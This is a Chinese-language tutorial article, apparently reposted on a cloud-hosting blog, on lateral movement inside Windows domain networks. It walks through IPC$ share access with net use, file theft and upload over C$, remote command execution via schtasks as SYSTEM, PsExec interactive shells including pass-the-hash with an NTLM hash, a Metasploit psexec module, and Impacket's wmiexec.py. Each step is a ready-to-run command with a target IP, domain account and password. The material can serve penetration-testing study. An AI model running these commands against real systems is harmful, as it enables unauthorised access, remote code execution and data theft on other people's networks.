如何使用内网中横向移动的命令行工具

发布时间:2021-10-15 09:21:45 作者:iii
来源:亿速云 阅读:180

这篇文章主要讲解了“如何使用内网中横向移动的命令行工具”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何使用内网中横向移动的命令行工具”吧!

目标机器: 192.168.101.157

一、IPC$连接

IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

调出命令行窗口,可以先执行net use查看已建立的连接

如何使用内网中横向移动的命令行工具

执行以下命令与目标建立ipc$连接

net use \\192.168.101.157(目标ip) /u:god(域名)\Administrator(用户名) hongrisec@2020(密码)

如何使用内网中横向移动的命令行工具执行成功会返回命令成功完成

之后可以使用dir命令列出目标文件夹文件,如执行以下命令列出c盘下文件夹

dir \\192.168.101.157\c$

如何使用内网中横向移动的命令行工具

列出c盘下phpStudy目录的文件

dir \\192.168.101.157\c$\phpStudy

如何使用内网中横向移动的命令行工具

如果想下载文件则执行以下命令,将phpshao.dll文件下载存放至temp文件夹处

copy \\192.168.101.157\c$\phpStudy\phpshao.dll C:\Windows\temp

如何使用内网中横向移动的命令行工具

如何使用内网中横向移动的命令行工具

同理,如果想要上传文件的话则执行

copy F:\test.txt \\192.168.101.157\c$

如何使用内网中横向移动的命令行工具

可以看到已经将文件传输上去了

也可以通过计划任务执行系统命令,首先执行下面命令创建一个名为test2的计划任务

schtasks /create /s 192.168.101.157 /tn test2 /sc minute /mo 1 /tr "C:\Windows\System32\cmd.exe /c 'whoami > C:\Windows\temp\test2.txt'" /ru system /f /u god\Administrator /p hongrisec@2020

如何使用内网中横向移动的命令行工具

之后执行以下命令,立即执行计划任务

schtasks /run /s 192.168.101.157 /i /tn test2 /u god\Administrator /p hongrisec@2020

如何使用内网中横向移动的命令行工具

执行成功之后使用type命令查看执行内容的回显

type \\192.168.101.157\c$\Windows\temp\test2.txt

如何使用内网中横向移动的命令行工具

二、psexec

也可以通过psexec去连接目标,不过动静有点大,会在目标机器上起一个服务,产生大量日志

可以在这里下载

如何使用内网中横向移动的命令行工具

执行以下命令获取一个交互式的shell,如果无法建立连接,尝试使用管理员身份执行

PsExec64.exe -accepteula \\192.168.101.157(目标IP) -u god(域)\Administrator(用户名) -p hongrisec@2020(密码) -s cmd.exe

如何使用内网中横向移动的命令行工具也可以执行以下命令,使用hash进行连接

psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"

当然msf里面也有模块可以通过psexec与目标连接

exploit/windows/smb/psexec

三、wmiexec.py连接

可以在这里下载工具包

直接执行以下命令就可以建立连接了

python wmiexec.py god(域)/administrator(用户名):hongrisec@2020(密码)@192.168.101.157(目标IP)

如何使用内网中横向移动的命令行工具

也可以使用hash去连接目标,稍微变一下就可以了

感谢各位的阅读,以上就是“如何使用内网中横向移动的命令行工具”的内容了,经过本文的学习后,相信大家对如何使用内网中横向移动的命令行工具这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是亿速云,小编将为大家推送更多相关知识点的文章,欢迎关注!

推荐阅读:
  1. 内网环境中公网域名解析成内网地址的问题
  2. 如何使用内网穿透访问内网ssh

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

上一篇:Linux服务器从入门到精通的问题有哪些

下一篇:Istanbul Linux下的屏幕录像机怎么用

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》